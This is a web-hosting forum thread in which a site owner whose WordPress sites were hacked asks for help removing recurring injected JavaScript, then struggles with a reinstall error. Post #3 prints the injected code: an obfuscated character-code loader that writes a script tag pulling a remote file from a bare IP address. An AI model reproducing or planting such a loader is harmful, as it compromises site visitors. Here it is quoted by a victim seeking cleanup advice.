Sites hacked


#1

all our websites under our main user have been hacked.
i was really shocked when dreamhost support say they can’t help!

so … i have no idea how this happened and very little idea how to stop it.

i’ve found the code that’s being inserted (javascript) and removed it, but it keeps coming back.

how do i find how/where/what is putting it there so i can get rid of it once and for all?

really hope someone can help!


#2

Since you gave us no idea what’s actually on your site, start with the basic:

Restore from known good backups
Change all passwords
Make sure all of your software is patched

It’s not a shock that Support won’t help. Their servers are secure; it’s users’ sites that aren’t secure and it’s up to the users to secure their own sites.

-Scott


#3

i’ve done all that!
but there’s obviously something still there that i can’t find that’s putting the code back on my sites :frowning:
please can anyone give me any ideas where to start looking?

this is the javascript:

var s="",i,c=0,o="";
var str=“60|115|99|114|105|112|116|32|116|121|112|101|61|34|116|101|120|116|47|106|97|118|97|115|99|114|105|112|116|34|32|115|114|99|61|34|104|116|116|112|58|47|47|56|52|46|50|52|52|46|49|51|56|46|53|53|47|115|116|97|116|115|47|115|116|97|116|46|106|115|34|62|60|47|115|99|114|105|112|116|62|”;
l=str.length;
for(c=0;c<=str.length-1;c ){
while(str.charAt©!=’|’)s=s str.charAt(c );
o=o String.fromCharCode(s);
s="";}
document.write(o);

and yes it was a shock to me that dreamhost support weren’t prepared to help.


#4

You still haven’t provided any additional information regarding what’s installed at your site.

To dig deeper, look through your Apache logs in /logs/YOURDOMAIN/httpd for entries at about the time your site was hacked.

-Scott


#5

What kind of websites are you running?

Maximum Cash Discount on any plan with MAXCASH

How To Install PHP.INI / ionCube on DreamHost


#6

Do you have wordpress installed?


#7

yes and i suspect that’s where they got in. i’ve re-installed wordpress and made sure it’s completely up to date, but i’m still having problems.

i’m also in the process of moving all the sites (once cleaned) into different user accounts so at least if it happens again then only one site can be attacked (i hope!)


#8

ok, an update, and sorry if i sound dumb - i don’t know much outside of html and seo!

i’m just trying to reinstall wordpress onto an existing domain (that used to run wordpress but i have deleted it). i’ve also created a new mysql database (so it’s not the one the site/wordpress used to use).

but i am getting this error “You appear to have already installed WordPress. To reinstall please clear your old database tables first”

i’ve tried this twice and checked and double-checked but the database is empty.

is it possible that the information_schema has been affected by the hack (i’m using the same mysql hostname)?

if so, what do i do?


#9
  1. Goodies -> One Click Installs. See if the previous installation is listed under Modify/Delete existing software (in both Easy and Advanced sections) If so, then delete it.

  2. Use phpMySQL to log into the database and Drop all tables. Or delete the database in the Goodies -> Manage MySQL section. Or create a new database. And use/change new passwords!

  3. One-Click a new WordPress installation (with a new username and password). And stay away from sketchy plugins. Were you using any additional plugins last time?

Good idea. They could be exploiting one of your other sites to get into your home directory.
-Scott


#10

thanks but i’ve already done all that. even created a new database hostname!

looking at wp-config.php the only thing i can see that might be wrong is:
$table_prefix = ‘wp_h6od3i_’;

?


#11

Table prefix is pretty random, so that’s not a problem.

So if you’ve already done all that, then you should be fine.

-Scott


#12

but i’m still getting the error message
"You appear to have already installed WordPress. To reinstall please clear your old database tables first."


#13

Check the tables using phpMyAdmin.

Maximum Cash Discount on any plan with MAXCASH

How To Install PHP.INI / ionCube on DreamHost


#14

done that - there are no tables!


#15

Change: $table_prefix = ‘wp_h6od3x_’;

Maximum Cash Discount on any plan with MAXCASH

How To Install PHP.INI / ionCube on DreamHost


#16

already tried that. no joy :frowning:


#17

How did you install WP this time around?

Have you checked the installation files via SFTP?

Maximum Cash Discount on any plan with MAXCASH

How To Install PHP.INI / ionCube on DreamHost


#18

i’ve tried one-click install and uploading via sftp.
both result in same error message.